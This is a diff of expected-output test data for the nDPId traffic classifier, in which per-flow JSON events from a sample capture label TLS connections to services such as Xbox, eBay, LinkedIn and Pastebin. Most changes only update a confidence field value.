-00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1646482995689,"flow_last_seen":1646482995732,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":491,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"2.17.140.63","src_port":48902,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Xbox","breed":"Fun","category":"Game"}} -00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1646482759960,"flow_last_seen":1646482760002,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":491,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"2.17.141.49","src_port":40832,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.eBay","breed":"Safe","category":"Shopping"}} -00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1646482879566,"flow_last_seen":1646482879632,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4764,"flow_avg_l4_payload_len":595,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"23.1.68.189","src_port":57336,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Playstation","breed":"Fun","category":"Game"}} -00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1646482860064,"flow_last_seen":1646482860150,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":5476,"flow_avg_l4_payload_len":608,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"13.107.42.14","src_port":48654,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.LinkedIn","breed":"Fun","category":"SocialNetwork"}} -00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1646482802720,"flow_last_seen":1646482802742,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":483,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"35.201.112.136","src_port":47122,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.LastFM","breed":"Fun","category":"Music"}} -00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1646482845216,"flow_last_seen":1646482845260,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1945,"flow_avg_l4_payload_len":486,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"108.139.210.102","src_port":57014,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Bloomberg","breed":"Acceptable","category":"Cloud"}} -00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1646482734324,"flow_last_seen":1646482734359,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1340,"flow_tot_l4_payload_len":4476,"flow_avg_l4_payload_len":559,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"151.101.192.92","src_port":56468,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Vevo","breed":"Fun","category":"Music"}} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1646482940480,"flow_last_seen":1646482940513,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":483,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"142.250.180.142","src_port":38858,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleMaps","breed":"Safe","category":"Web"}} -00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1646482896911,"flow_last_seen":1646482896928,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1945,"flow_avg_l4_payload_len":486,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"108.138.199.67","src_port":43150,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Deezer","breed":"Fun","category":"Music"}} +00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1646482995689,"flow_last_seen":1646482995732,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":491,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"2.17.140.63","src_port":48902,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Xbox","breed":"Fun","category":"Game"}} +00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1646482759960,"flow_last_seen":1646482760002,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":491,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"2.17.141.49","src_port":40832,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.eBay","breed":"Safe","category":"Shopping"}} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1646482879566,"flow_last_seen":1646482879632,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4764,"flow_avg_l4_payload_len":595,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"23.1.68.189","src_port":57336,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Playstation","breed":"Fun","category":"Game"}} +00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1646482860064,"flow_last_seen":1646482860150,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":5476,"flow_avg_l4_payload_len":608,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"13.107.42.14","src_port":48654,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.LinkedIn","breed":"Fun","category":"SocialNetwork"}} +00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1646482802720,"flow_last_seen":1646482802742,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":483,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"35.201.112.136","src_port":47122,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.LastFM","breed":"Fun","category":"Music"}} +00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1646482845216,"flow_last_seen":1646482845260,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1945,"flow_avg_l4_payload_len":486,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"108.139.210.102","src_port":57014,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Bloomberg","breed":"Acceptable","category":"Cloud"}} +00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1646482734324,"flow_last_seen":1646482734359,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1340,"flow_tot_l4_payload_len":4476,"flow_avg_l4_payload_len":559,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"151.101.192.92","src_port":56468,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Vevo","breed":"Fun","category":"Music"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1646482940480,"flow_last_seen":1646482940513,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":483,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"142.250.180.142","src_port":38858,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.GoogleMaps","breed":"Safe","category":"Web"}} +00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1646482896911,"flow_last_seen":1646482896928,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1945,"flow_avg_l4_payload_len":486,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"108.138.199.67","src_port":43150,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Deezer","breed":"Fun","category":"Music"}} 00661{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1646482916232,"flow_last_seen":1646482916249,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"18.65.82.67","src_port":52070,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"},"http": {}} 00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1646482916232,"flow_last_seen":1646482916249,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"18.65.82.67","src_port":52070,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00824{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1646482866432,"flow_last_seen":1646482866473,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1977,"flow_avg_l4_payload_len":494,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"104.23.98.190","src_port":39934,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"TLS.Pastebin","breed":"Potentially Dangerous","category":"Download"}} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1646482785304,"flow_last_seen":1646482785442,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4008,"flow_avg_l4_payload_len":501,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"95.131.169.91","src_port":51248,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Tuenti","breed":"Acceptable","category":"VoIP"}} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1646482724450,"flow_last_seen":1646482724472,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1945,"flow_avg_l4_payload_len":486,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"18.66.196.102","src_port":51806,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.SoundCloud","breed":"Fun","category":"Music"}} -00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1646482634412,"flow_last_seen":1646482634459,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1977,"flow_avg_l4_payload_len":494,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"172.65.251.78","src_port":53998,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GitLab","breed":"Fun","category":"Collaborative"}} -00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1646483012464,"flow_last_seen":1646483013011,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":5436,"flow_avg_l4_payload_len":604,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"40.97.160.2","src_port":39828,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft365","breed":"Acceptable","category":"Collaborative"}} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1646482786097,"flow_last_seen":1646482786234,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4008,"flow_avg_l4_payload_len":501,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"95.131.170.91","src_port":39302,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Tuenti","breed":"Acceptable","category":"VoIP"}} -00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1646482753482,"flow_last_seen":1646482753526,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":491,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"23.1.66.79","src_port":48140,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.CNN","breed":"Safe","category":"Web"}} -00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1646482772264,"flow_last_seen":1646482772325,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":491,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"185.125.190.21","src_port":42884,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.UbuntuONE","breed":"Acceptable","category":"Cloud"}} +00824{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1646482866432,"flow_last_seen":1646482866473,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1977,"flow_avg_l4_payload_len":494,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"104.23.98.190","src_port":39934,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"TLS.Pastebin","breed":"Potentially Dangerous","category":"Download"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1646482785304,"flow_last_seen":1646482785442,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4008,"flow_avg_l4_payload_len":501,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"95.131.169.91","src_port":51248,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Tuenti","breed":"Acceptable","category":"VoIP"}} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1646482724450,"flow_last_seen":1646482724472,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1945,"flow_avg_l4_payload_len":486,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"18.66.196.102","src_port":51806,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.SoundCloud","breed":"Fun","category":"Music"}} +00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1646482634412,"flow_last_seen":1646482634459,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1977,"flow_avg_l4_payload_len":494,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"172.65.251.78","src_port":53998,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.GitLab","breed":"Fun","category":"Collaborative"}} +00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1646483012464,"flow_last_seen":1646483013011,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":5436,"flow_avg_l4_payload_len":604,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"40.97.160.2","src_port":39828,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Microsoft365","breed":"Acceptable","category":"Collaborative"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1646482786097,"flow_last_seen":1646482786234,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4008,"flow_avg_l4_payload_len":501,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"95.131.170.91","src_port":39302,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Tuenti","breed":"Acceptable","category":"VoIP"}} +00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1646482753482,"flow_last_seen":1646482753526,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":491,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"23.1.66.79","src_port":48140,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.CNN","breed":"Safe","category":"Web"}} +00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1646482772264,"flow_last_seen":1646482772325,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":491,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"185.125.190.21","src_port":42884,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.UbuntuONE","breed":"Acceptable","category":"Cloud"}} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646495650748,"flow_last_seen":1646495650748,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646495650748,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"52.113.194.132","src_port":57878,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":1646495650748,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646495650748,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8GIFAAEAGaR3AqAGANHHChOIWAbvSHIRRAAAAAKAC+vCUIQAAAgQFtAQCCApnoF3vAAAAAAEDAwc="} 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":463,"source":"sites.pcapng","alias":"nDPId-test","flow_id":38,"flow_packet_id":2,"flow_last_seen":1646495650768,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1646495650768,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA0H0NAAHQGLmM0ccKEwKgBgAG74hatJvO00hyEUoAS\/\/\/a2QAAAgQFoAEDAwgBAQQC"} 01153{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":464,"source":"sites.pcapng","alias":"nDPId-test","flow_id":38,"flow_packet_id":3,"flow_last_seen":1646495650768,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":571,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":571,"pkt_l4_len":537,"thread_ts_msec":1646495650768,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAItGINAAEAGZyrAqAGANHHChOIWAbvSHIRSrSbztVAYAfbGZQAAFgMBAgABAAH8AwO6eoC9IxGTkdV9vVeJGWk4znzi7kZuVq2WW+Nl\/2Sg0SCU+jy21h8ySE7r\/PfMeW\/+6AejiqSkX1JQLDj\/qy1dewAgSkoTARMCEwPAK8AvwCzAMMypzKjAE8AUAJwAnQAvADUBAAGTCgoAAAAAABUAEwAAEHRlYW1zLm9mZmljZS5jb20AFwAA\/wEAAQAACgAKAAjKygAdABcAGAALAAIBAAAjAAAAEAAOAAwCaDIIaHR0cC8xLjEABQAFAQAAAAAADQASABAEAwgEBAEFAwgFBQEIBgYBABIAAAAzACsAKcrKAAEAAB0AIP361tTnT+5yNMG5uzlpGoadVy4F1\/ksgWxYfkq0hvgPAC0AAgEBACsABwYaGgMEAwMAGwADAgACRGkABQADAmgyWloAAQAAFQDHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA